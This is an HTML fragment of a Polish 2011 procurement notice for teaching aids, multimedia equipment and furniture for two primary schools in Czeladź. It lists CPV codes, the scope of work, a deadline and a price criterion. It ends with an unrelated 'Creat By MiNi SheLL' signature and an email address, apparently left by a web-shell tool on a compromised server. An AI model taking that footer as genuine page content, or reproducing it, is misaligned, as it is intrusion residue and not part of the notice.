<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa pomocy dydaktycznych, sprzętu multimedialnego oraz mebli w ramach projektu pn: Indywidualizacja procesu nauczania uczniów klas I-III szkół podstawowych zlokalizowanych na terenie Gminy Czeladź do SZKOŁY PODSTAWOWEJ NR 3 W CZELADZI, ul. Staszica 47.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kody CPV dot. zadania (39162100-6 pomoce dydaktyczne; 39162110-9 - sprzęt dydaktyczny; 22110000-4- drukowane książki; 30190000-7- różny sprzęt i artykuły biurowe; 37400000-2 artykuły i sprzęt sportowy; 39160000-1 meble szkolne)

1.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, zagrożonych ryzykiem dysleksji.
2.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
3.	Dostawa materiałów dydaktycznych do prowadzenia gimnastyki korekcyjnej dla dzieci z wadami postawy. 
4.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych w dziedzinie nauk matematyczno- przyrodniczych. 
Szczegółowy opis przedmiotu zamówienia w załączniku nr 1c do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 22.11.00.00-4, 30.19.00.00-7, 37.40.00.00-2, 39.16.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa pomocy dydaktycznych, sprzętu multimedialnego oraz mebli w ramach projektu pn: Indywidualizacja procesu nauczania uczniów klas I-III szkół podstawowych zlokalizowanych na terenie Gminy Czeladź do SZKOŁY PODSTAWOWEJ NR 7 W CZELADZI, ul. Spacerowa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kody CPV dot. zadania (39162100-6 pomoce dydaktyczne; 39162110-9 - sprzęt dydaktyczny; 22110000-4- drukowane książki; 30190000-7- różny sprzęt i artykuły biurowe; 37400000-2 artykuły i sprzęt sportowy; 39160000-1 meble szkolne; 32330000-5- aparatura do nagrywania i powielania dźwięku i obrazu wideo)
1.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, zagrożonych ryzykiem dysleksji. 
2.	Dostawa materiałów dydaktycznych do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. 
3.	Dostawa materiałów dydaktycznych do prowadzenia zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy.
4.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych dziedzinie nauki języka angielskiego.
5.	Dostawa materiałów dydaktycznych do prowadzenia zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych artystycznie. 
Szczegółowy opis przedmiotu zamówienia w załączniku nr 1d do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 22.11.00.00-4, 30.19.00.00-7, 37.40.00.00-2, 39.16.00.00-1, 32.33.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com